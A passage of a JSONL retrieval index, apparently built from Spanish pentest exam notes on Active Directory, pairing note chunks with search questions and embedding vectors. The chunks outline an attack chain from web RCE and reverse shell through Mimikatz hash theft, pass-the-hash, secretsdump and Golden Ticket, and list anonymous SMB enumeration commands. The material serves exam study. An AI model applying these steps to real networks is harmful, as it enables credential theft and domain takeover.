-0.0817, -0.04426, 0.07993, -0.03974, 0.04963, 0.01468, -0.10038, -0.00229, -0.00653, -0.0421, -0.09045, 0.0703, 0.00687, 0.0252, 0.00768, -0.00273, 0.03255, 0.0641, -0.06342, -0.07573, 0.05982, 0.03595, -0.04228, 0.00276, 0.0666, -0.08727, 0.03884, 0.00784, -0.07208, -0.05115, 0.05125, -0.02631, 0.02045, -0.06052, -0.03853, 0.01399, -0.02818, -0.05183, 0.02342, -0.02969, 0.04504, -0.03214, 0.01882, 0.0188, 0.00142, -0.02439, 0.01074, -0.03931, -0.03818, -0.02898, -0.03549, -0.07373, -0.04779, -0.00609, -0.0002, -0.01953, 0.01608, -0.01608, -0.0111, 0.06797, -0.00351, -0.0079, 0.01061, -0.01829, 0.05074, -0.0367, -0.043, 0.01137, 0.02249, -0.02737, -0.00239, 0.02322, -0.0217, 0.02487, 0.03031, -0.02902, 0.05001, -0.03657, 0.03132, -0.00396, 0.06431, 0.01073, 0.04483, 0.02262, -0.0181, 0.02888, 0.05843, -0.00689, 0.04845, -0.02521, -0.04948, -0.01407, 0.05549, 0.06191, -0.00113, 0.01823, 0.01277, -0.02056, -0.06518, 0.02873, -0.01506, 0.00882, 0.00801, -0.02687, -0.0027, -0.00177, 0.00106, -0.04032]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "quΓ© herramienta sirve para atacar dominios Active Directory sin interfaz grΓ‘fica?", "v": [0.05531, 0.05087, -0.10744, -0.19921, 0.09743, -0.08596, 0.01175, -0.03734, -0.09114, 0.1258, 0.13166, -0.1707, -0.14063, -0.14147, 0.12047, -0.02691, 0.1773, -0.10154, -0.06286, -0.06073, 0.01106, 0.0641, -0.0539, -0.06812, -0.03738, -0.08788, 0.00384, -0.08457, -0.11265, 0.0525, -0.00227, -0.03195, 0.13371, -0.06945, -0.07618, -0.17914, -0.06838, 0.04485, 0.14989, 0.04734, -0.00807, 0.05747, -0.2047, 0.02251, 0.01939, 0.00564, -0.04304, -0.06371, 0.02687, 0.02355, -0.01927, -0.13117, -0.11251, 0.00433, 0.03028, -0.07565, 0.16218, -0.1388, 0.01337, -0.06366, -0.07722, -0.00072, -0.00847, -0.09114, -0.00905, -0.07536, -0.00735, -0.08338, -0.01642, 0.06733, 0.0036, 0.09499, 0.05327, 0.04778, 0.07453, -0.03341, 0.0201, -0.0134, 0.09594, 0.01873, 0.13659, -0.01507, -0.10397, 0.01769, -0.06601, -0.15262, -0.0413, -0.10059, -0.01277, -0.08459, 0.04899, 0.07038, -0.08906, -0.01744, 0.01694, 0.01802, 0.04819, -0.00923, 0.04548, -0.04692, 0.05624, -0.0093, -0.17408, 0.0634, 0.05612, 0.03311, -0.08305, -0.01681, -0.08649, 0.02122, 0.0547, -0.04782, 0.03717, -0.00664, 0.00825, 0.10907, -0.05788, -0.03266, 0.00075, -0.06194, -0.04151, -0.00316, 0.01962, 0.05206, -0.04939, 0.01237, -0.03441, 0.02589, -0.02363, -0.06938, -0.02621, -0.05576, -0.00463, -0.07908, -0.08961, -0.00462, 0.00752, -0.07558, 0.01396, -0.05628, 0.01773, 0.05355, 0.01784, -0.02717, -0.01439, 0.04189, 0.11488, -0.04043, -0.07778, 0.01962, 0.00287, -0.04129, 0.01119, 0.05237, 0.01693, 0.01373, -0.03169, 0.0164, -0.08535, 0.01492, -0.03124, -0.00448, -0.00704, 0.06297, -0.02153, -0.06055, -0.06044, 0.001, 0.05809, 0.12305, 0.01702, 0.05067, 0.01791, -0.0471, 0.01686, -0.01755, -0.05069, 0.02638, 0.00082, -0.04835, -0.00877, -0.03766, -0.03413, 0.01975, -0.08176, 0.00537, 0.00986, -0.01504, 0.0229, 0.00706, 0.00625, 0.07415, 0.00087, -0.01551, 0.03011, -0.06697, 0.02345, -0.03415, -0.03558, -0.0214, 0.03423, 0.00129, -0.02019, -0.0371, 0.07759, 0.10285, -0.01583, 0.05471, 0.01618, 0.00268, -0.07227, 0.01504, 0.04492, -0.00479, -0.048, -0.00406, 0.02642, 0.00636, 0.00384, -0.03719, -0.01739, 0.01469, -0.01072, -0.04615, 0.03338, 0.04423, -0.00911, -0.03071, -0.00174, 0.00173, -0.00661, -0.02962, 0.01545, -0.00123, -0.00238, -0.03064, 0.03371, -0.03275, -0.0513, -0.03336, -0.00931, 0.04212, -0.01314, -0.00017, -0.04794, -0.0972, -0.01259, -0.02645, -0.00104, -0.06522, -0.03277, 0.0255, 0.06853, 0.00142, -0.00192, 0.00759]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "con quΓ© programa puedo hablar por red contra una vΓ­ctima en un examen tΓ©cnico?", "v": [-0.11819, 0.08479, -0.09674, -0.22574, -0.04412, -0.02326, -0.03783, 0.03833, 0.01651, -0.08546, -0.04125, 0.0148, -0.03101, 0.04265, 0.07737, 0.0852, 0.11456, -0.00403, 0.21326, -0.05304, 0.01435, -0.13788, -0.01762, -0.01045, 0.0934, 0.0507, -0.02065, 0.01756, 0.06878, -0.00188, -0.00099, -0.01741, 0.01766, -0.11407, 0.06508, 0.13576, 0.04232, 0.05151, 0.07753, 0.16161, 0.05787, -0.04283, -0.03833, -0.02225, 0.17019, -0.0149, 0.04227, 0.00505, -0.04679, 0.0012, 0.00455, -0.02232, 0.00074, -0.1872, -0.01458, -0.08382, 0.01775, -0.03342, 0.09543, -0.06361, 0.13205, -0.04005, 0.09448, 0.01608, 0.1167, -0.02254, 0.07552, 0.08928, -0.04023, 0.06795, 0.02418, -0.04966, -0.04408, -0.03793, -0.08282, -0.00081, -0.10715, 0.00503, 0.02245, -0.10645, -0.01801, 0.04637, -0.0368, 0.10775, -0.09624, -0.00387, 0.05919, -0.06249, -0.04599, -0.10079, 0.04544, -0.02501, 0.08782, -0.03556, 0.07548, -0.03835, 0.13672, -0.08089, -0.0799, -0.05286, 0.09245, -0.08137, -0.01835, 0.0424, -0.02913, 0.04631, 0.01845, 0.00743, -0.08036, -0.0135, -0.05013, 0.05662, -0.03653, -0.00985, -0.03875, -0.10943, 0.01386, 0.0225, 0.00331, 0.03185, 0.04449, 0.09353, 0.04868, -0.00176, 0.0682, -0.02735, 0.00962, 0.02078, -0.03553, 0.06994, 0.08438, 0.04657, 0.00384, -0.08264, -0.01988, 0.008, 0.04437, -0.06216, 0.04389, -0.02783, -0.04002, 0.11042, -0.04525, -0.03954, -0.03623, 0.03558, -0.01044, -0.13868, -0.07917, 0.02759, 0.05959, -0.02002, 0.03851, 0.07426, -0.14401, -0.02817, 0.03407, -0.05158, 0.02828, 0.09656, -0.05677, -0.01035, -0.07134, -0.02493, 0.05247, -0.01641, -0.02914, -0.03931, 0.12521, 0.03288, 0.03084, 0.00815, -0.00571, -0.03559, -0.02476, -0.05483, 0.04856, -0.09945, -0.0223, -0.15113, -0.07899, 0.00205, -0.03403, -0.01753, 0.0285, -0.00306, -0.07961, 0.03599, 0.05642, -0.03039, -0.03232, 0.01282, -0.01317, -0.00236, -0.03353, 0.01332, -0.00974, 0.03491, -0.04226, -0.07148, -0.1271, 0.0373, 0.02369, -0.01907, 0.02182, 0.08331, -0.01332, -0.01738, -0.00252, 0.10094, 0.03859, 0.04032, 0.05615, -0.0554, -0.04262, -0.05674, 0.00778, 0.06322, 0.04055, 0.02631, 0.05135, -0.01615, 0.04659, 0.04343, -0.01143, -0.04015, -0.03555, 0.00343, 0.00654, -0.00551, -0.01024, -0.08614, 0.04022, -0.0082, 0.01402, -0.00256, 0.05066, 0.03074, -0.03888, -0.05497, -0.02313, 0.08232, -0.03592, -0.07268, -0.00781, 0.03192, -0.06248, 0.01998, 0.02813, -0.05838, -0.00711, 0.08077, 0.03217, -0.09923, -0.00269, -0.01471]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Active Directory (Γ­ndice)\n\n> El **set de AD = 40 puntos** del examen (3 mΓ‘quinas encadenadas). Ver Estructura del examen.\n> Idea clave: tu Kali no tiene GUI central; cada tool (Impacket, Mimikatz, BloodHound) habla por red con la vΓ­ctima. Ver Puesto de mando Kali.", "indexar": "cuΓ‘l es el mejor mΓ©todo para montar un ataque en cadena de tres mΓ‘quinas en Active Directory?", "v": [-0.00227, 0.00498, -0.14199, -0.15652, -0.23627, -0.00925, -0.05033, 0.10628, -0.1062, -0.01837, 0.00235, -0.10414, -0.01776, -0.06527, 0.14008, -0.01075, 0.1064, -0.08591, 0.04893, -0.08756, -0.05414, -0.05749, -0.03193, -0.05364, 0.00616, 0.17867, -0.00231, 0.03973, -0.20046, 0.00461, 0.05217, 0.07738, 0.10939, 0.01615, 0.05448, -0.1947, -0.02854, 0.04156, 0.09983, 0.07465, -0.17637, -0.08267, -0.17064, 0.00473, 0.10678, 0.03354, 0.12555, -0.02792, -0.06446, 0.08149, 0.02422, 0.01737, -0.04371, -0.04505, -0.00279, -0.09881, -0.01147, 0.02175, 0.02585, -0.05955, 0.02501, -0.04395, -0.06703, -0.01366, -0.04082, -0.06827, 0.0451, -0.02747, -0.13126, -0.06745, 0.03861, -0.16497, -0.04276, 0.10263, 0.00185, -0.00512, 0.14999, 0.08381, 0.02667, 0.073, 0.01286, -0.09881, -0.03348, -0.00591, -0.05483, -0.00108, 0.11014, -0.15624, -0.02531, -0.07346, 0.08405, 0.01256, 0.00548, -0.02832, 0.02051, -0.01044, 0.07707, 0.03266, 0.08398, -0.01422, 0.00484, -0.05013, -0.0892, 0.16193, -0.01713, 0.07813, -0.04188, 0.06964, -0.01393, -0.10774, -0.01132, 0.00809, -0.02225, -0.04438, -0.10939, -0.01443, -0.05675, -0.00296, -0.05023, 0.04835, -0.06009, 0.06231, 0.02901, 0.01114, 0.01345, -0.00659, 0.03918, 0.03207, -0.02096, -0.01382, -0.01214, 0.03598, 0.01179, -0.04464, -0.00814, -0.02477, 0.03279, -0.06908, -0.05247, -0.04372, 0.00215, 0.02794, -0.01333, -0.04671, 0.02426, -0.00985, 0.07114, -0.0998, -0.03384, 0.07096, -0.00999, 0.08839, 0.0786, 0.01119, -0.01997, 0.01068, 0.04395, -0.03353, -0.01084, 0.14693, 0.05375, -0.01437, -0.09797, 0.05244, -0.0242, -0.00503, -0.041, 0.00019, 0.01241, -0.00912, 0.03776, 0.05252, 0.00068, -0.01593, 0.01811, 0.01005, -0.00453, -0.01485, 0.08311, 0.03342, -0.00633, 0.00222, -0.05567, -0.05604, 0.01737, -0.00155, 0.07013, 0.0534, 0.04483, 0.04804, 0.01267, 0.00788, -0.06582, -0.03935, 0.07283, -0.10438, -0.0051, 0.00506, 0.05658, -0.02868, -0.02728, 0.01891, 0.02327, -0.03729, -0.01241, 0.05046, -0.04562, -0.00738, 0.02422, 0.01668, 0.02907, -0.03651, 0.05594, -0.03183, -0.01555, 0.02831, -0.04217, -0.0036, -0.08533, 0.00923, 0.02821, -0.00427, 0.01593, -0.00305, -0.04881, -0.05842, -0.00439, -0.0091, 0.02164, -0.03854, -0.0448, -0.01702, 0.07528, -0.00141, -0.02028, -0.01708, 0.08359, -0.04923, -0.03585, -0.05315, -0.02651, 0.01825, 0.02247, 0.01744, -0.04149, 0.01956, -0.03821, -0.01314, -0.0621, -0.04607, -0.01864, 0.03782, -0.05498, 0.00239, -0.0105, -0.03095]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "que programa se usa para obtener hashes NTLM de usuarios de dominio?", "v": [-0.10432, -0.08973, 0.00018, -0.1787, -0.01615, -0.06949, -0.12542, -0.0374, -0.14338, 0.15271, -0.06691, -0.08715, 0.07087, -0.117, -0.08728, -0.03812, 0.09416, -0.05035, 0.04738, -0.02379, -0.07664, 0.01378, -0.09717, -0.02966, -0.0485, -0.06701, -0.04656, -0.0978, -0.00129, 0.14949, 0.02537, -0.12541, -0.09362, 0.00738, 0.01573, -0.03968, 0.06472, 0.02003, 0.11762, 0.19906, 0.13065, 0.09959, -0.1201, 0.05105, 0.05733, -0.00326, -0.06751, -0.1011, 0.07968, -0.22874, 0.04093, 0.05016, -0.15555, -0.05122, 0.05285, -0.06694, 0.04271, -0.11381, -0.12242, -0.01564, -0.08049, -0.07225, 0.0523, -0.03069, -0.09486, -0.10559, 0.0996, 0.04004, -0.04454, 0.06639, -0.03365, 0.04102, 0.10288, -0.09962, 0.02755, 0.02672, 0.01685, -0.08574, 0.06255, -0.03919, 0.05579, -0.05077, -0.00286, -0.00815, -0.17848, -0.09571, -0.03394, -0.06438, 0.03133, 0.06871, 0.05937, 0.08239, -0.03895, -0.00318, 0.06769, -0.10374, 0.10259, -0.05755, 0.00218, 0.00747, 0.08344, 0.05134, -0.03644, 0.11663, -0.00601, 0.06856, 0.0642, -0.02791, -0.01632, 0.10118, 0.0749, -0.08477, -0.0845, -0.02295, -0.08306, 0.10516, -0.02334, -0.01437, 0.00538, -0.04701, -0.08714, 0.04471, 0.03069, 0.03885, 0.08895, 0.00583, -0.01461, 0.03781, -0.11859, -0.07603, 0.05952, -0.05424, -0.0218, 0.01582, 0.00694, 0.00647, 0.01912, 0.01749, -0.01018, -0.03611, 0.03655, 0.04526, -0.09249, 0.0159, 0.0331, -0.07574, 0.01225, -0.11315, -0.00168, -0.04793, 0.0048, 0.00438, -0.04624, -0.01421, 0.00423, 0.0176, -0.06059, 0.01102, -0.12277, 0.01041, -0.01974, 0.01031, -0.02128, -0.0175, 0.03579, -0.0054, 0.06019, 0.01517, 0.03659, 0.05557, -0.01798, 0.04074, 0.02134, -0.04194, 0.00256, 0.00883, 0.0319, -0.015, -0.05302, -0.03261, -0.024, -0.01921, 0.07297, 0.02414, -0.04481, 0.02285, -0.00824, 0.06535, -0.03389, -0.01195, -0.00424, 0.05891, -0.04449, -0.00675, 0.04759, -0.02069, -0.00441, 0.00973, 0.01961, -0.04958, -0.04639, 5e-05, 0.04547, 0.00476, -0.001, 0.03729, 0.01942, -0.05853, 0.0456, 0.0201, 0.00309, -0.00561, -0.00355, -0.01995, -0.02134, 0.00253, -0.02726, 0.04409, 0.02403, -0.03938, -0.11364, 0.02776, -0.02549, 0.0374, 0.00672, -0.07723, -0.02541, 0.02492, 0.01036, 0.01454, -0.01593, -0.0513, -0.00645, -3e-05, 0.02556, -0.0293, -0.0257, 0.02926, 0.00524, -0.04104, -0.05914, 0.04162, 0.03291, -0.0134, -0.01864, 0.00686, -0.05653, 0.01453, -0.01842, 0.07133, -0.00977, -0.01886, 0.00945, -0.0032, -0.03581, 0.04287]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "con que puedo mapear el camino hacia un administrador de dominio?", "v": [0.01453, 0.0717, -0.04642, -0.12792, -0.14897, -0.01668, 0.13624, 0.03427, -0.24575, -0.02593, 0.08782, -0.07613, 0.05368, -0.11869, -0.01507, 0.03601, 0.28122, 0.05053, 0.02384, -0.05556, 0.03921, -0.03293, 0.0319, 0.04709, 0.01231, -0.03647, 0.04017, -0.08396, -0.04414, -0.01132, 0.03178, 0.06456, 0.07378, -0.05536, -0.00666, -0.12587, 0.03156, 0.08101, -0.00942, 0.09142, -0.05232, -0.08024, -0.10053, 0.06801, -0.1135, 0.0016, -0.02558, -0.14358, 0.09611, -0.12907, -0.03973, -0.14958, -0.12061, -0.05162, 0.09529, 0.07147, 0.09326, -0.061, 0.08973, -0.07483, -0.03987, -0.00955, 0.00422, 0.05978, -0.03436, -0.07774, 0.0622, 0.0323, -0.04113, 0.04603, 0.00377, 0.09213, 0.05087, 0.05237, 0.05706, -0.00808, 0.04857, 0.04133, 0.08786, 0.01688, 0.11491, 0.03874, -0.14517, -0.04863, -0.09576, -0.11697, -0.09577, -0.10431, 0.09858, 0.00029, -0.01224, 0.03076, -0.01688, -0.01449, -0.07255, -0.0299, 0.003, -0.03973, -0.10049, 0.00332, 0.03915, 0.10202, -0.05417, 0.07892, 0.08746, 0.10382, 0.06332, -0.04414, 0.003, 0.04821, 0.00148, 0.01402, -0.07981, -0.02439, -0.0303, 0.06032, -0.08163, 0.04909, -0.01706, -0.06881, -0.02036, -0.0468, -0.01995, 0.0824, 0.10564, 0.04033, 0.01226, 0.00804, 0.04305, -0.08764, -6e-05, -0.03744, -0.01281, -0.05527, -0.07775, 0.12535, -0.04499, 0.0512, 0.03856, 0.0199, -0.05839, 0.03411, -0.03696, -0.07832, 0.04068, -0.02522, -0.01151, -0.1111, -0.03671, -0.01238, -0.05874, 0.05045, 0.01024, 0.08573, 0.04337, 0.07278, 0.00141, -0.01053, -0.01604, 0.05065, -0.00334, 0.03809, -0.07217, 0.11467, 0.04006, -0.02266, 0.01235, -0.00475, -0.00454, -0.00997, -0.09453, 0.06366, 0.02411, 0.0037, 0.00659, 0.00125, -0.02703, 0.00213, 0.02848, 0.06236, 0.00163, -0.05914, 0.0431, 0.10623, -0.10914, 0.07516, 0.0098, 0.04825, -0.02248, 0.03413, 0.02652, 0.06033, 0.01285, -0.01935, -0.00616, -0.05561, 0.08979, 0.02792, -0.10321, -0.01762, -0.00501, -0.02837, 0.00407, 0.02233, -0.02611, 0.00047, -0.00354, 0.04332, 0.01847, 0.00987, -0.02344, -0.03066, 0.02533, -0.03787, -0.01886, -0.02522, -0.00989, 0.01756, -0.0475, -0.05104, -0.00528, 0.08464, 0.02074, -0.0412, 0.06592, -0.04211, -0.00712, -0.04507, -0.0171, 0.02697, -0.03276, 0.01075, -0.00992, 0.00992, 0.01477, 0.01114, 0.04581, -0.02941, 0.02235, -0.00199, -0.02504, 0.02803, 0.04831, -0.03179, -0.10625, -0.05846, -0.01962, 0.02232, -0.05743, -0.03041, 0.02729, -0.02298, 0.0272, 0.03871, -0.04052, 0.00507]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## La cadena de ataque tΓ­pica\n```\n1) RCE en web β†’ Reverse shell en USER1\n2) PEASS-ng β†’ privesc β†’ SYSTEM en USER1 (Privesc Windows / Potato attacks)\n3) Mimikatz β†’ hash NTLM de un usuario de dominio\n4) BloodHound β†’ ΒΏcamino a Domain Admin?\n5) Pass-the-Hash / Impacket β†’ shell en SERVER2 (Movimiento lateral)\n6) si SERVER2 = DC β†’ secretsdump β†’ toda la BD del dominio\n7) hash de krbtgt β†’ Golden Ticket β†’ dios\n```", "indexar": "cual es una herramienta para realizar ataques de movimiento lateral entre servidores?", "v": [-0.06741, 0.05662, -0.1808, -0.22637, -0.12765, -0.09358, -0.01706, 0.03436, 0.01641, 0.02262, -0.06005, -0.04993, 0.03275, -0.05996, 0.1364, 0.06185, 0.16436, -0.06925, 0.02047, 0.0148, -0.05543, 0.03582, 0.05073, 0.02886, -0.06008, 0.05604, 0.0245, -0.02045, -0.13754, -0.00549, -0.05086, -0.02167, 0.08121, -0.0539, 0.04096, -0.0878, -0.01024, 0.15549, 0.00272, 0.08479, -0.07626, -0.02505, -0.22294, -0.06869, 0.00954, 0.01075, -0.02242, -0.00188, 0.05077, 0.01038, 0.00733, 0.03205, -0.10971, -0.0719, -0.07898, -0.11734, 0.15451, -0.11254, 0.02707, -0.09292, -0.10025, 0.09623, -0.05188, -0.05988, 0.03818, -0.12708, 0.00496, -0.11339, -0.11822, -0.00019, -0.00355, 0.04159, -0.06572, 0.03256, -0.03665, 0.09788, 0.04265, 0.00741, 0.02368, 0.05624, 0.01118, 0.08815, -0.11401, 0.05154, -0.14384, -0.12703, 0.03736, -0.03214, 0.00853, 0.02289, 0.04755, 0.07413, -0.10959, 0.03781, -0.05788, 0.04883, -0.01648, -0.12138, -0.05533, -0.05999, 0.13801, -0.02268, -0.11768, -0.00449, -0.00781, -0.00303, -0.01801, 0.00731, -0.00976, -0.06367, 0.05734, -0.04217, -0.00031, 0.03288, 0.00928, -0.02213, -0.10816, -0.04264, 0.00925, 0.02195, -0.00243, 0.01947, -0.07636, -0.03257, -0.00085, -0.02442, 0.01747, -0.0071, -0.09078, -0.10458, 0.06949, -0.02198, -0.0402, 0.00436, -0.08425, -0.0133, 0.11359, -0.08204, 0.04859, -0.05132, 0.04699, 0.04547, -0.0179, -0.03497, 0.06899, 0.05385, 0.09033, -0.00149, -0.08478, 0.02205, -0.01539, -0.04669, -0.00097, 0.00736, -0.08432, 0.01143, -0.09108, -0.01605, -0.174, 0.03928, 0.01589, 0.04925, -0.01515, 0.03597, -0.01908, -0.07854, -0.00242, 0.06585, 0.08384, 0.03511, 0.00477, -0.0004, 0.04841, -0.02662, 0.0026, -0.02254, -0.11347, -0.02886, 0.07801, -0.02742, -0.00921, 0.01252, -0.04692, -0.02208, 0.02082, -0.06103, 0.06112, -0.01136, 0.03061, 0.08258, 0.00295, 0.00139, -0.01195, -0.02468, 0.04881, -0.04802, -0.06036, -0.05833, 0.04479, 0.0094, -0.0341, -0.05118, -0.04762, -0.02504, 0.02823, 0.07024, -0.04338, -0.00851, -0.01186, 0.02011, 0.02212, -0.02887, 0.12245, -0.00837, -0.04392, -0.02057, 0.02701, -0.02202, -0.03542, -0.01706, 0.0292, -0.01308, 0.04924, 6e-05, -0.03131, 0.02643, 0.01369, -0.01761, -0.00366, -0.00237, 0.0347, 0.00114, -0.0035, -0.04637, 0.02015, -0.02224, 0.10224, -0.03824, -0.06716, -0.03089, -0.01417, 0.04351, -0.02103, -0.04767, -0.02314, -0.08356, -0.04774, -0.01633, -0.02587, -0.06251, 0.03108, 0.01354, 0.04233, -0.02697, 0.02614, -0.02363]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "que tecnica de ataque sirve para obtener contraseΓ±as sin autenticarse en el dominio?", "v": [0.055, -0.05212, -0.18852, -0.16138, 0.01236, -0.09142, 0.02093, -0.10537, -0.06972, 0.15674, -0.00824, -0.06969, -0.04505, -0.12304, 0.08981, -0.04218, 0.19031, 0.0283, 0.12739, -0.02856, 0.02418, -0.0915, -0.01273, -0.03324, 0.02521, -0.07702, -0.00148, 0.00324, -0.04718, -0.02596, 0.06736, -0.0291, 0.08958, 0.02862, 0.04156, 0.00821, -0.04077, 0.11925, 0.11813, 0.13643, 0.07884, -0.03513, -0.19024, 0.07507, 0.02275, 0.00597, 0.09081, 0.03702, 0.10503, -0.05002, -0.01538, -0.00461, -0.12382, -0.12212, -0.0723, -0.0864, 0.1423, -0.03311, 0.02682, -0.02885, -0.13331, -0.0463, 0.04263, 0.01313, -0.02829, -0.11685, 0.06891, -0.00728, -0.02974, -0.00172, 0.02008, 0.02521, -0.00067, 0.05091, 0.03528, -0.0838, 0.02707, 0.04038, 0.06798, 0.00203, -0.00798, 0.00945, -0.04255, -0.09077, -0.13053, -0.04041, 0.03304, -0.11122, 0.05402, -0.09087, 0.0922, 0.04062, -0.03748, -0.07055, -0.04766, -0.04423, -0.01082, -0.09907, -0.06211, -0.05567, 0.01212, 0.00607, -0.07865, 0.0894, 0.06709, 0.07518, 0.00601, -0.09043, 0.02557, -0.0687, -0.04181, -0.02965, -0.11779, -0.00271, 0.00579, 0.01374, -0.08127, -0.05035, 0.00172, 0.01414, -0.08403, -0.09289, 0.03179, 0.03318, -0.05147, 0.04935, 0.01086, -0.06833, -0.0671, -0.11118, 0.00794, -0.06771, -0.00415, 0.0268, -0.02845, 0.08361, 0.0771, -0.14653, -0.14784, 0.01969, -0.00963, 0.08016, -0.05948, -0.01973, -0.026, -0.00639, 0.05192, -0.10044, -0.08703, 0.00875, -0.06189, -0.02748, 0.00189, 0.10608, -0.04141, 0.0158, -0.08064, -0.05939, -0.04414, 0.15361, -0.00306, 0.00647, -0.09744, 0.04883, -0.08324, -0.02452, 0.01369, -0.02019, 0.06376, 0.08612, 0.02032, 0.0579, 0.00021, -0.01378, -0.00579, -0.001, -0.01691, -0.05881, 0.006, -0.03958, -0.01209, -0.1189, -0.00985, 0.03928, 0.01248, 0.03322, 0.06406, 0.01771, -0.03761, 0.02743, 0.0121, -0.02467, -0.07166, 0.09009, -0.02128, -0.03746, -0.03791, -0.00913, 0.00172, -0.00854, 0.0044, -0.03864, -0.02019, -0.02192, 0.05839, 0.04786, -0.04699, -0.10013, -0.05596, -0.00526, -0.0154, -0.00363, 0.01439, -0.09058, -0.08039, -0.02321, -0.01744, 0.01343, -0.04373, -0.03167, 0.00369, -0.00712, 0.01258, 0.04586, 0.04247, -0.04018, -0.01986, -0.04604, 0.03913, 0.00042, -0.0081, -0.0033, -0.00992, 0.04261, 0.07578, -0.01642, 0.00918, -0.01335, -0.03508, -0.01057, -0.0547, -0.02577, 0.02842, -0.05409, -0.04347, -0.04564, -0.07141, 0.01593, -0.00234, -0.00473, -0.03267, -0.00042, 0.01714, 0.04927, 0.02035, -0.01763]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "cual es una alternativa libre a BloodHound para mapear privilegios?", "v": [-0.07554, -0.01173, 0.04871, 0.04052, -0.16423, 0.05303, 0.04579, -0.0766, -0.13277, -0.01831, 0.01916, -0.14832, 0.05274, 0.11888, -0.02505, -0.0342, -0.00371, -0.01886, 0.10491, -0.03755, -0.05632, 0.0062, -0.19673, -0.03008, -0.09536, -0.08886, 0.06993, 0.11414, -0.13974, 0.00606, -0.02525, -0.07809, 0.00571, -0.00217, -0.03736, -0.0036, 0.09606, 0.11105, 0.02841, 0.00716, 0.03444, -0.10226, 0.01737, 0.01267, -0.01265, -0.09124, -0.10748, 0.16873, 0.09796, 0.07358, 0.06737, 0.01748, -0.15904, -0.08906, 0.10727, 0.05135, 0.01348, -0.12155, -0.08081, 0.00554, -0.08293, -0.0257, 0.03549, -0.07251, 0.04374, -0.02688, 0.00503, -0.00886, -0.03673, 0.16272, 0.0082, 0.02976, 0.03074, 0.02246, -0.11889, -0.04869, -0.05579, -0.0615, 0.05339, 0.06154, 0.07105, 0.01686, -0.0583, 0.04556, 0.00857, -0.02812, 0.07356, -0.02411, 0.07184, 0.11675, 0.07399, 0.0278, -0.00407, 0.1471, -0.01178, -0.16483, -0.01212, 0.1164, 0.01392, 0.0103, 0.10513, 0.05341, -0.18348, 0.09241, 0.09509, -0.04585, -0.08218, -0.01633, -0.08351, 0.00721, 0.01499, 0.06455, -0.04013, 0.1185, 0.00776, -0.03053, 0.1237, 0.12337, 0.07513, -0.04482, -0.04801, -0.00167, -0.01853, -0.0593, -0.00071, 0.02104, -0.03488, 0.02611, -0.01238, 0.06549, -0.00056, 0.05263, -0.05356, -0.10041, -0.11358, 0.03988, 0.03367, 